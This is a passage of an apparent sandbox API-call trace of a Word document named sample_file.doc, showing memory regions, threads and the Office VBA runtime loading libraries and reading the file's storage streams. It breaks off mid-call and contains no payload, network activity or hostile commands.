"" Region: id = 636 start_va = 0x99e0000 end_va = 0x9ab0fff entry_point = 0x0 region_type = private name = "private_0x00000000099e0000" filename = "" Region: id = 637 start_va = 0x5fcd0000 end_va = 0x60155fff entry_point = 0x5fcd0000 region_type = mapped_file name = "msgr3en.dll" filename = "\\Program Files\\Microsoft Office\\Office15\\PROOF\\1033\\MSGR3EN.DLL" (normalized: "c:\\program files\\microsoft office\\office15\\proof\\1033\\msgr3en.dll") Region: id = 638 start_va = 0x7ff8e000 end_va = 0x7ff8efff entry_point = 0x0 region_type = private name = "private_0x000000007ff8e000" filename = "" Region: id = 2197 start_va = 0x750000 end_va = 0x75ffff entry_point = 0x0 region_type = private name = "private_0x0000000000750000" filename = "" Region: id = 2198 start_va = 0x770000 end_va = 0x7a1fff entry_point = 0x0 region_type = private name = "private_0x0000000000770000" filename = "" Region: id = 2199 start_va = 0xac0000 end_va = 0xb3ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ac0000" filename = "" Region: id = 2200 start_va = 0xb40000 end_va = 0xbbffff entry_point = 0xb40000 region_type = mapped_file name = "~dfdcaba5b1b29a7115.tmp" filename = "\\Users\\BGC6U8~1\\AppData\\Local\\Temp\\~DFDCABA5B1B29A7115.TMP" (normalized: "c:\\users\\bgc6u8~1\\appdata\\local\\temp\\~dfdcaba5b1b29a7115.tmp") Region: id = 2201 start_va = 0x2900000 end_va = 0x297ffff entry_point = 0x2900000 region_type = mapped_file name = "sample_file." filename = "\\Users\\BGC6U8~1\\Desktop\\sample_file." (normalized: "c:\\users\\bgc6u8~1\\desktop\\sample_file.") Region: id = 2202 start_va = 0x2980000 end_va = 0x29fffff entry_point = 0x2980000 region_type = mapped_file name = "~df53bec21329ec25f4.tmp" filename = "\\Users\\BGC6U8~1\\AppData\\Local\\Temp\\~DF53BEC21329EC25F4.TMP" (normalized: "c:\\users\\bgc6u8~1\\appdata\\local\\temp\\~df53bec21329ec25f4.tmp") Region: id = 2203 start_va = 0x7200000 end_va = 0x72fffff entry_point = 0x0 region_type = private name = "private_0x0000000007200000" filename = "" Region: id = 2204 start_va = 0x9ac0000 end_va = 0x9c11fff entry_point = 0x0 region_type = private name = "private_0x0000000009ac0000" filename = "" Region: id = 2205 start_va = 0x9c90000 end_va = 0x9d8ffff entry_point = 0x0 region_type = private name = "private_0x0000000009c90000" filename = "" Region: id = 2206 start_va = 0x9d90000 end_va = 0xa18ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000009d90000" filename = "" Region: id = 2207 start_va = 0x6e50000 end_va = 0x6f06fff entry_point = 0x6e50000 region_type = mapped_file name = "arialbd.ttf" filename = "\\Windows\\Fonts\\arialbd.ttf" (normalized: "c:\\windows\\fonts\\arialbd.ttf") Region: id = 2208 start_va = 0x73e80000 end_va = 0x73e88fff entry_point = 0x73e815a6 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\System32\\netutils.dll" (normalized: "c:\\windows\\system32\\netutils.dll") Region: id = 2209 start_va = 0x74740000 end_va = 0x74764fff entry_point = 0x74742b71 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\System32\\powrprof.dll" (normalized: "c:\\windows\\system32\\powrprof.dll") Thread: id = 1 os_tid = 0xa08 Thread: id = 2 os_tid = 0xa04 Thread: id = 3 os_tid = 0xa00 Thread: id = 4 os_tid = 0x9fc Thread: id = 5 os_tid = 0x9f8 Thread: id = 6 os_tid = 0x9f4 Thread: id = 7 os_tid = 0x9e0 Thread: id = 8 os_tid = 0x9dc Thread: id = 9 os_tid = 0x9d4 Thread: id = 10 os_tid = 0x9d0 Thread: id = 11 os_tid = 0x9c8 [0021.868] GetModuleHandleA (lpModuleName=0x0) returned 0xc10000 [0021.868] RegisterClassA (lpWndClass=0x126148) returned 0x183c192 [0022.053] SysStringLen (param_1="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\VBEUI.DLL") returned 0x43 [0022.053] SysStringLen (param_1="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\VBEUI.DLL") returned 0x43 [0022.053] lstrcpyW (in: lpString1=0x125e10, lpString2="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\VBEUI.DLL" | out: lpString1="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\VBEUI.DLL") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\VBEUI.DLL" [0022.053] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\VBEUI.DLL", cchWideChar=-1, lpMultiByteStr=0x126018, cbMultiByte=135, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\VBEUI.DLL", lpUsedDefaultChar=0x0) returned 68 [0022.053] GetModuleHandleA (lpModuleName="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\VBEUI.DLL") returned 0x0 [0022.404] LoadLibraryExA (lpLibFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\VBEUI.DLL", hFile=0x0, dwFlags=0x8) returned 0x6d220000 [0022.513] GetLastError () returned 0x0 [0022.513] GetProcAddress (hModule=0x6d220000, lpProcName="_MsoVBADigSigCallDlg@20") returned 0x6d34fe80 [0022.513] GetProcAddress (hModule=0x6d220000, lpProcName="_MsoVbaInitSecurity@4") returned 0x6d2d8951 [0022.514] GetProcAddress (hModule=0x6d220000, lpProcName="_MsoFIEPolicyAndVersion@8") returned 0x6d2ccd31 [0022.514] GetProcAddress (hModule=0x6d220000, lpProcName="_MsoFAnsiCodePageSupportsLCID@8") returned 0x6d2d882e [0022.514] GetProcAddress (hModule=0x6d220000, lpProcName="_MsoFInitOffice@20") returned 0x6d2ccd4b [0022.514] GetProcAddress (hModule=0x6d220000, lpProcName="_MsoUninitOffice@4") returned 0x6d2896db [0022.514] GetProcAddress (hModule=0x6d220000, lpProcName="_MsoFGetFontSettings@20") returned 0x6d281af9 [0022.515] GetProcAddress (hModule=0x6d220000, lpProcName="_MsoRgchToRgwch@16") returned 0x6d289bae [0022.515] GetProcAddress (hModule=0x6d220000, lpProcName="_MsoHrSimpleQueryInterface@16") returned 0x6d2834e1 [0022.515] GetProcAddress (hModule=0x6d220000, lpProcName="_MsoHrSimpleQueryInterface2@20") returned 0x6d283523 [0022.515] GetProcAddress (hModule=0x6d220000, lpProcName="_MsoFCreateControl@36") returned 0x6d284a26 [0022.515] GetProcAddress (hModule=0x6d220000, lpProcName="_MsoFLongLoad@8") returned 0x6d381250 [0022.516] GetProcAddress (hModule=0x6d220000, lpProcName="_MsoFLongSave@8") returned 0x6d381259 [0022.516] GetProcAddress (hModule=0x6d220000, lpProcName="_MsoFGetTooltips@0") returned 0x6d2bdfac [0022.516] GetProcAddress (hModule=0x6d220000, lpProcName="_MsoFSetTooltips@4") returned 0x6d2e2845 [0022.516] GetProcAddress (hModule=0x6d220000, lpProcName="_MsoFLoadToolbarSet@24") returned 0x6d2cdd8b [0022.516] GetProcAddress (hModule=0x6d220000, lpProcName="_MsoFCreateToolbarSet@28") returned 0x6d2823c9 [0022.517] GetProcAddress (hModule=0x6d220000, lpProcName="_MsoHpalOffice@0") returned 0x6d28c568 [0022.517] GetProcAddress (hModule=0x6d220000, lpProcName="_MsoFWndProcNeeded@4") returned 0x6d2818d2 [0022.517] GetProcAddress (hModule=0x6d220000, lpProcName="_MsoFWndProc@24") returned 0x6d282a70 [0022.517] GetProcAddress (hModule=0x6d220000, lpProcName="_MsoFCreateITFCHwnd@20") returned 0x6d281925 [0022.517] GetProcAddress (hModule=0x6d220000, lpProcName="_MsoDestroyITFC@4") returned 0x6d28958b [0022.518] GetProcAddress (hModule=0x6d220000, lpProcName="_MsoFPitbsFromHwndAndMsg@12") returned 0x6d288820 [0022.518] GetProcAddress (hModule=0x6d220000, lpProcName="_MsoFGetComponentManager@4") returned 0x6d2835a4 [0022.518] GetProcAddress (hModule=0x6d220000, lpProcName="_MsoMultiByteToWideChar@24") returned 0x6d28ac03 [0022.518] GetProcAddress (hModule=0x6d220000, lpProcName="_MsoWideCharToMultiByte@32") returned 0x6d284d33 [0022.518] GetProcAddress (hModule=0x6d220000, lpProcName="_MsoHrRegisterAll@0") returned 0x6d34f8b6 [0022.519] GetProcAddress (hModule=0x6d220000, lpProcName="_MsoFSetComponentManager@4") returned 0x6d28c179 [0022.519] GetProcAddress (hModule=0x6d220000, lpProcName="_MsoFCreateStdComponentManager@20") returned 0x6d2819d5 [0022.519] GetProcAddress (hModule=0x6d220000, lpProcName="_MsoFHandledMessageNeeded@4") returned 0x6d286736 [0022.519] GetProcAddress (hModule=0x6d220000, lpProcName="_MsoPeekMessage@8") returned 0x6d28649f [0022.520] GetProcAddress (hModule=0x6d220000, lpProcName="_MsoFCreateIPref@28") returned 0x6d27f9cf [0022.520] GetProcAddress (hModule=0x6d220000, lpProcName="_MsoDestroyIPref@4") returned 0x6d289320 [0022.520] GetProcAddress (hModule=0x6d220000, lpProcName="_MsoChsFromLid@4") returned 0x6d27f864 [0022.520] GetProcAddress (hModule=0x6d220000, lpProcName="_MsoCpgFromChs@4") returned 0x6d281cc5 [0022.520] GetProcAddress (hModule=0x6d220000, lpProcName="_MsoSetLocale@4") returned 0x6d27f984 [0022.520] GetProcAddress (hModule=0x6d220000, lpProcName="_MsoFSetHMsoinstOfSdm@4") returned 0x6d28198e [0022.521] GetProcAddress (hModule=0x6d220000, lpProcName="_MsoSetVbaInterfaces@8") returned 0x6d34ff8d [0022.521] GetProcAddress (hModule=0x6d220000, lpProcName="_MsoGetControlInstanceId@8") returned 0x6d3286e7 [0022.558] GetModuleFileNameA (in: hModule=0x720d0000, lpFilename=0x126030, nSize=0x104 | out: lpFilename="C:\\PROGRA~1\\COMMON~1\\MICROS~1\\VBA\\VBA7.1\\VBE7.DLL" (normalized: "c:\\progra~1\\common~1\\micros~1\\vba\\vba7.1\\vbe7.dll")) returned 0x31 [0022.618] lstrlenA (lpString="C:\\PROGRA~1\\COMMON~1\\MICROS~1\\VBA\\VBA7.1\\VBE7.DLL") returned 49 [0022.618] lstrcpyA (in: lpString1=0x38a0c70, lpString2="C:\\PROGRA~1\\COMMON~1\\MICROS~1\\VBA\\VBA7.1\\VBE7.DLL" | out: lpString1="C:\\PROGRA~1\\COMMON~1\\MICROS~1\\VBA\\VBA7.1\\VBE7.DLL") returned="C:\\PROGRA~1\\COMMON~1\\MICROS~1\\VBA\\VBA7.1\\VBE7.DLL" [0022.619] GetCurrentDirectoryA (in: nBufferLength=0x104, lpBuffer=0x125e08 | out: lpBuffer="C:\\Users\\BGC6u8Oy yXGxkR\\Desktop") returned 0x20 [0022.619] OaBuildVersion () returned 0x321396 [0022.619] LoadLibraryA (lpLibFileName="OLEAUT32.DLL") returned 0x76ba0000 [0022.625] GetLastError () returned 0x0 [0022.625] GetProcAddress (hModule=0x76ba0000, lpProcName="SysFreeString") returned 0x76ba3e59 [0022.625] GetProcAddress (hModule=0x76ba0000, lpProcName="LoadTypeLib") returned 0x76bb0aa2 [0022.625] GetProcAddress (hModule=0x76ba0000, lpProcName="RegisterTypeLib") returned 0x76bc1ea6 [0022.625] GetProcAddress (hModule=0x76ba0000, lpProcName="QueryPathOfRegTypeLib") returned 0x76bd351b [0022.626] GetProcAddress (hModule=0x76ba0000, lpProcName="UnRegisterTypeLib") returned 0x76bd1ca9 [0022.626] GetProcAddress (hModule=0x76ba0000, lpProcName="OleTranslateColor") returned 0x76bd26fa [0022.626] GetProcAddress (hModule=0x76ba0000, lpProcName="OleCreateFontIndirect") returned 0x76bc352f [0022.626] GetProcAddress (hModule=0x76ba0000, lpProcName="OleCreatePictureIndirect") returned 0x76bc3df8 [0022.626] GetProcAddress (hModule=0x76ba0000, lpProcName="OleLoadPicture") returned 0x76c07c49 [0022.627] GetProcAddress (hModule=0x76ba0000, lpProcName="OleCreatePropertyFrameIndirect") returned 0x76c093fc [0022.627] GetProcAddress (hModule=0x76ba0000, lpProcName="OleCreatePropertyFrame") returned 0x76c0944a [0022.627] GetProcAddress (hModule=0x76ba0000, lpProcName="OleIconToCursor") returned 0x76c0776e [0022.627] GetProcAddress (hModule=0x76ba0000, lpProcName="LoadTypeLibEx") returned 0x76bb07b7 [0022.627] GetProcAddress (hModule=0x76ba0000, lpProcName="OleLoadPictureEx") returned 0x76c070a1 [0022.628] DefWindowProcA (hWnd=0x201d4, Msg=0x81, wParam=0x0, lParam=0x125cd4) returned 0x1 [0022.628] DefWindowProcA (hWnd=0x201d4, Msg=0x83, wParam=0x0, lParam=0x125d10) returned 0x0 [0022.628] DefWindowProcA (hWnd=0x201d4, Msg=0x1, wParam=0x0, lParam=0x125cd4) returned 0x0 [0022.628] DefWindowProcA (hWnd=0x201d4, Msg=0x5, wParam=0x0, lParam=0x0) returned 0x0 [0022.628] DefWindowProcA (hWnd=0x201d4, Msg=0x3, wParam=0x0, lParam=0x0) returned 0x0 [0022.629] DefWindowProcA (hWnd=0x201d4, Msg=0x46, wParam=0x0, lParam=0x12609c) returned 0x0 [0022.629] DefWindowProcA (hWnd=0x201d4, Msg=0x47, wParam=0x0, lParam=0x12609c) returned 0x0 [0022.629] DefWindowProcA (hWnd=0x201d4, Msg=0x3, wParam=0x0, lParam=0x1c202d0) returned 0x0 [0022.630] CRetailMalloc_Alloc () returned 0x78b72b0 [0022.630] GetUserDefaultLCID () returned 0x409 [0022.666] CRetailMalloc_Alloc () returned 0x2865238 [0022.666] CRetailMalloc_Alloc () returned 0x55d6e38 [0022.666] CRetailMalloc_Alloc () returned 0x7869dd8 [0022.666] CRetailMalloc_Alloc () returned 0x77627a0 [0022.666] CRetailMalloc_Alloc () returned 0x28247a0 [0022.666] CRetailMalloc_Alloc () returned 0x78b73d0 [0022.667] CRetailMalloc_Alloc () returned 0x55d6e10 [0022.747] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\BGC6U8~1\\Desktop\\sample_file.doc", cchWideChar=-1, lpMultiByteStr=0x126630, cbMultiByte=83, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\BGC6U8~1\\Desktop\\sample_file.doc", lpUsedDefaultChar=0x0) returned 42 [0022.747] lstrlenA (lpString="C:\\Users\\BGC6U8~1\\Desktop\\sample_file.doc") returned 41 [0022.747] lstrcpyA (in: lpString1=0x38a0df8, lpString2="C:\\Users\\BGC6U8~1\\Desktop\\sample_file.doc" | out: lpString1="C:\\Users\\BGC6U8~1\\Desktop\\sample_file.doc") returned="C:\\Users\\BGC6U8~1\\Desktop\\sample_file.doc" [0022.748] CRetailMalloc_Alloc () returned 0x78b1500 [0022.748] CRetailMalloc_Alloc () returned 0x54bf6c8 [0022.748] CRetailMalloc_Alloc () returned 0x5727e28 [0022.748] CRetailMalloc_Alloc () returned 0x5747258 [0022.748] CRetailMalloc_Alloc () returned 0x56a84e0 [0022.748] CRetailMalloc_Alloc () returned 0x7762d30 [0022.748] lstrcpyA (in: lpString1=0x38a0e30, lpString2="C:\\Users\\BGC6U8~1\\Desktop\\sample_file.doc" | out: lpString1="C:\\Users\\BGC6U8~1\\Desktop\\sample_file.doc") returned="C:\\Users\\BGC6U8~1\\Desktop\\sample_file.doc" [0022.748] lstrcpyA (in: lpString1=0x38a0e30, lpString2="C:\\Users\\BGC6U8~1\\Desktop\\sample_file.doc" | out: lpString1="C:\\Users\\BGC6U8~1\\Desktop\\sample_file.doc") returned="C:\\Users\\BGC6U8~1\\Desktop\\sample_file.doc" [0022.748] lstrcpyA (in: lpString1=0x38a0e30, lpString2="C:\\Users\\BGC6U8~1\\Desktop\\sample_file.doc" | out: lpString1="C:\\Users\\BGC6U8~1\\Desktop\\sample_file.doc") returned="C:\\Users\\BGC6U8~1\\Desktop\\sample_file.doc" [0022.748] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0022.748] wcscpy_s (in: _Destination=0x12632e, _SizeInWords=0x105, _Source="C:\\Users\\BGC6U8~1\\Desktop\\sample_file.doc" | out: _Destination="C:\\Users\\BGC6U8~1\\Desktop\\sample_file.doc") returned 0x0 [0022.749] wcscpy_s (in: _Destination=0x534e778, _SizeInWords=0x2d, _Source="*\\CC:\\Users\\BGC6U8~1\\Desktop\\sample_file.doc" | out: _Destination="*\\CC:\\Users\\BGC6U8~1\\Desktop\\sample_file.doc") returned 0x0 [0022.749] wcscpy_s (in: _Destination=0x5747268, _SizeInWords=0x108, _Source="*\\CC:\\Users\\BGC6U8~1\\Desktop\\sample_file.doc" | out: _Destination="*\\CC:\\Users\\BGC6U8~1\\Desktop\\sample_file.doc") returned 0x0 [0022.749] CExposedDocFile::OpenStorage () returned 0x0 [0022.749] CExposedDocFile::OpenStream () returned 0x0 [0022.749] CExposedStream::Release () returned 0x0 [0022.749] CExposedDocFile::OpenStream () returned 0x0 [0022.749] CExposedStream::Release () returned 0x0 [0022.749] CRetailMalloc_Alloc () returned 0x5675a50 [0022.749] wcscpy_s (in: _Destination=0x125ec8, _SizeInWords=0x40, _Source="__SRP_" | out: _Destination="__SRP_") returned 0x0 [0022.749] _ltow_s (in: _Value=0, _Buffer=0x125ed4, _BufferCount=0x3a, _Radix=16 | out: _Buffer="0") returned 0x0 [0022.749] CExposedDocFile::OpenStream () returned 0x80030002 [0022.767] CRetailMalloc_Free () returned 0xf430001 [0022.767] longjmp () [0022.767] CRetailMalloc_Alloc () returned 0x5675a50 [0022.767] CRetailMalloc_Alloc () returned 0x5668870 [0022.767] CRetailMalloc_Alloc () returned 0x56688e0 [0022.767] CRetailMalloc_Alloc () returned 0x2875858 [0022.767] CRetailMalloc_Alloc () returned 0x2875ca8 [0022.767] CRetailMalloc_Alloc () returned 0x2875ed0 [0022.767] CRetailMalloc_Alloc () returned 0x55d8e18 [0022.767] CRetailMalloc_Alloc () returned 0x786b4e8 [0022.767] CRetailMalloc_Alloc () returned 0x5727e28 [0022.767] CRetailMalloc_Alloc () returned 0x78b1cc0 [0022.767] CRetailMalloc_Alloc () returned 0x5727eb0 [0022.767] CRetailMalloc_Alloc () returned 0x55d8df0 [0022.767] CRetailMalloc_Alloc () returned 0x5727f38 [0022.767] CRetailMalloc_Alloc () returned 0x78b1cd0 [0022.767] CRetailMalloc_Alloc () returned 0x78b1ce0 [0022.768] CRetailMalloc_Alloc () returned 0x5727f38 [0022.768] CRetailMalloc_Alloc () returned 0x2809438 [0022.768] CRetailMalloc_Alloc () returned 0x572bd00 [0022.769] CExposedDocFile::OpenStream () returned 0x0 [0022.769] CRetailMalloc_Alloc () returned 0x777bdc0 [0022.769] CExposedStream::Read () returned 0x0 [0022.773] GetProcAddress (hModule=0x6d220000, lpProcName="_MsoMultiByteToWideChar@24") returned 0x6d28ac03 [0022.773] CRetailMalloc_Alloc () returned 0x572c730 [0022.773] CRetailMalloc_Free () returned 0x1 [0022.780] SysStringLen (param_1="Word") returned 0x4 [0022.780] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Word", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0022.780] SysStringLen (param_1="Word") returned 0x4 [0022.780] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Word", cchWideChar=5, lpMultiByteStr=0x27e77fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Word", lpUsedDefaultChar=0x0) returned 5 [0022.780] CRetailMalloc_Alloc () returned 0x58092c8 [0022.780] CRetailMalloc_Free () returned 0x4c0001 [0022.780] CRetailMalloc_Alloc () returned 0x58092c8 [0022.780] CRetailMalloc_Free () returned 0x4c0001 [0022.785] SysStringLen (param_1="VBA") returned 0x3 [0022.785] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBA", cchWideChar=3, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 3 [0022.785] SysStringLen (param_1="VBA") returned 0x3 [0022.785] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBA", cchWideChar=4, lpMultiByteStr=0x2846c84, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBA", lpUsedDefaultChar=0x0) returned 4 [0022.790] CRetailMalloc_Alloc () returned 0x786b500 [0022.790] CRetailMalloc_Free () returned 0x5200101 [0022.790] CRetailMalloc_Alloc () returned 0x55d8df0 [0022.790] CRetailMalloc_Free () returned 0xe960001 [0022.790] CRetailMalloc_Alloc () returned 0x534e740 [0022.790] CRetailMalloc_Free () returned 0xffff0001 [0022.790] CRetailMalloc_Alloc () returned 0x534e740 [0022.790] CRetailMalloc_Free () returned 0xffff0001 [0022.791] CRetailMalloc_Alloc () returned 0x78b1cf0 [0022.791] CRetailMalloc_Alloc () returned 0x78b1d00 [0022.791] VirtualQuery (in: lpAddress=0x125ca8, lpBuffer=0x125c8c, dwLength=0x1c | out: lpBuffer=0x125c8c*(BaseAddress=0x125000, AllocationBase=0x30000, AllocationProtect=0x4, RegionSize=0xb000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0022.791] CRetailMalloc_Alloc () returned 0x78b1d10 [0022.791] CRetailMalloc_Free () returned 0x3640001 [0022.791] CRetailMalloc_Alloc () returned 0x78b2f50 [0022.791] CRetailMalloc_Alloc () returned 0x786b500 [0022.791] CRetailMalloc_Free () returned 0x3620001 [0022.791] CRetailMalloc_Free () returned 0x3600001 [0022.791] CRetailMalloc_Alloc () returned 0x786c498 [0022.794] CExposedDocFile::OpenStream () returned 0x0 [0022.794] CExposedStream::Read () returned 0x0 [0022.794] CRetailMalloc_Alloc () returned 0x786c8b8 [0022.794] CRetailMalloc_Alloc () returned 0x786e8d8 [0022.794] CExposedStream::AddRef () returned 0x2 [0022.794] CExposedStream::Release () returned 0x1 [0022.795] CExposedStream::Read () returned 0x0 [0022.795] CExposedStream::Read () returned 0x0 [0022.795] CompareStringA (Locale=0x409, dwCmpFlags=0x3, lpString1="Test", cchCount1=-1, lpString2="Test", cchCount2=-1) returned 2 [0022.795] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x125d38, cbMultiByte=2, lpWideCharStr=0x125d3c, cchWideChar=2 | out: lpWideCharStr="") returned 2 [0022.795] CRetailMalloc_Alloc () returned 0x78b5df0 [0022.795] CRetailMalloc_Free () returned 0x5200101 [0022.795] CRetailMalloc_Alloc () returned 0x55d8df0 [0022.795] CRetailMalloc_Free () returned 0x9a0201 [0022.796] CLSIDFromString (in: lpsz="{00020430-0000-0000-C000-000000000046}", pclsid=0x125c54 | out: pclsid=0x125c54*(Data1=0x20430, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0022.796] wcsncpy_s (in: _Destination=0x563ee34, _SizeInWords=0x5f, _Source="*\\G{00020430-0000-0000-C000-000000000046}#2.0#0#C:\\Windows\\SysWOW64\\stdole2.tlb#OLE Automation", _MaxCount=0x30 | out: _Destination="*\\G{00020430-0000-0000-C000-000000000046}#2.0#0#") returned 0x0 [0022.796] wcscpy_s (in: _Destination=0x563ee94, _SizeInWords=0x2f, _Source="C:\\Windows\\SysWOW64\\stdole2.tlb" | out: _Destination="C:\\Windows\\SysWOW64\\stdole2.tlb") returned 0x0 [0022.796] wcscpy_s (in: _Destination=0x563eed2, _SizeInWords=0x10, _Source="#OLE Automation" | out: _Destination="#OLE Automation") returned 0x0 [0022.797] CRetailMalloc_Alloc () returned 0x5729d18 [0022.797] CRetailMalloc_Free () returned 0x1 [0022.797] CRetailMalloc_Alloc () returned 0x5729d18 [0022.797] CRetailMalloc_Free () returned 0x1 [0022.797] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="stdole", cchWideChar=7, lpMultiByteStr=0x125c20, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="stdole", lpUsedDefaultChar=0x0) returned 7 [0022.797] CRetailMalloc_Alloc () returned 0x2876320 [0022.797] wcscpy_s (in: _Destination=0x563ee34, _SizeInWords=0x5f, _Source="*\\G{00020430-0000-0000-C000-000000000046}#2.0#0#C:\\Windows\\SysWOW64\\stdole2.tlb#OLE Automation" | out: _Destination="*\\G{00020430-0000-0000-C000-000000000046}#2.0#0#C:\\Windows\\SysWOW64\\stdole2.tlb#OLE Automation") returned 0x0 [0022.810] LoadTypeLib (in: szFile="C:\\Windows\\system32\\stdole2.tlb", pptlib=0x1259cc*=0x0 | out: pptlib=0x1259cc*=0x2876770) returned 0x0 [0022.814] wcscpy_s (in: _Destination=0x2876320, _SizeInWords=0x104, _Source="*\\G{00020430-0000-0000-C000-000000000046}#2.0#0#C:\\Windows\\system32\\stdole2.tlb#OLE Automation" | out: _Destination="*\\G{00020430-0000-0000-C000-000000000046}#2.0#0#C:\\Windows\\system32\\stdole2.tlb#OLE Automation") returned 0x0 [0022.814] CRetailMalloc_Free () returned 0x5f00001 [0022.814] IUnknown:AddRef (This=0x2876770) returned 0x4 [0022.814] IUnknown:QueryInterface (in: This=0x2876770, riid=0x720f6d54*(Data1=0xcacc1e8a, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x1259e0 | out: ppvObject=0x1259e0*=0x0) returned 0x80004002 [0022.814] CRetailMalloc_Alloc () returned 0x581a420 [0022.814] CRetailMalloc_Free () returned 0xe80001 [0022.814] CRetailMalloc_Alloc () returned 0x55d8df0 [0022.814] CRetailMalloc_Free () returned 0x2fc0001 [0022.826] wcscpy_s (in: _Destination=0x55d8ce2, _SizeInWords=0x7, _Source="Normal" | out: _Destination="Normal") returned 0x0 [0022.826] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Normal", cchWideChar=7, lpMultiByteStr=0x125c20, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Normal", lpUsedDefaultChar=0x0) returned 7 [0022.826] CRetailMalloc_Alloc () returned 0x579cd78 [0022.826] CRetailMalloc_Free () returned 0xf590001 [0022.826] CRetailMalloc_Alloc () returned 0x55d8cb0 [0022.826] CRetailMalloc_Free () returned 0x5a40001 [0022.827] CRetailMalloc_Alloc () returned 0x57f38c0 [0022.827] CRetailMalloc_Free () returned 0x1280001 [0022.827] CLSIDFromString (in: lpsz="{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}", pclsid=0x125c54 | out: pclsid=0x125c54*(Data1=0x2df8d04c, Data2=0x5bfa, Data3=0x101b, Data4=([0]=0xbd, [1]=0xe5, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x44, [6]=0xde, [7]=0x52))) returned 0x0 [0022.827] CRetailMalloc_Alloc () returned 0x51e7718 [0022.827] CRetailMalloc_Free () returned 0x11f0001 [0022.827] wcsncpy_s (in: _Destination=0x56835cc, _SizeInWords=0x9b, _Source="*\\G{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}#2.7#0#C:\\Program Files (x86)\\Common Files\\Microsoft Shared\\OFFICE16\\MSO.DLL#Microsoft Office 16.0 Object Library", _MaxCount=0x30 | out: _Destination="*\\G{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}#2.7#0#") returned 0x0 [0022.827] wcscpy_s (in: _Destination=0x568362c, _SizeInWords=0x6b, _Source="C:\\Program Files (x86)\\Common Files\\Microsoft Shared\\OFFICE16\\MSO.DLL" | out: _Destination="C:\\Program Files (x86)\\Common Files\\Microsoft Shared\\OFFICE16\\MSO.DLL") returned 0x0 [0022.827] wcscpy_s (in: _Destination=0x56836b6, _SizeInWords=0x26, _Source="#Microsoft Office 16.0 Object Library" | out: _Destination="#Microsoft Office 16.0 Object Library") returned 0x0 [0022.828] CRetailMalloc_Alloc () returned 0x5683858 [0022.828] CRetailMalloc_Free () returned 0x3880001 [0022.828] CRetailMalloc_Alloc () returned 0x5683858 [0022.828] CRetailMalloc_Free () returned 0x3880001 [0022.828] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Office", cchWideChar=7, lpMultiByteStr=0x125c20, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Office", lpUsedDefaultChar=0x0) returned 7 [0022.828] CRetailMalloc_Alloc () returned 0x2876320 [0022.828] wcscpy_s (in: _Destination=0x56835cc, _SizeInWords=0x9b, _Source="*\\G{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}#2.7#0#C:\\Program Files (x86)\\Common Files\\Microsoft Shared\\OFFICE16\\MSO.DLL#Microsoft Office 16.0 Object Library" | out: _Destination="*\\G{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}#2.7#0#C:\\Program Files (x86)\\Common Files\\Microsoft Shared\\OFFICE16\\MSO.DLL#Microsoft Office 16.0 Object Library") returned 0x0 [0022.843] LoadTypeLib (in: szFile="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE15\\MSO.DLL", pptlib=0x1259cc*=0x0 | out: 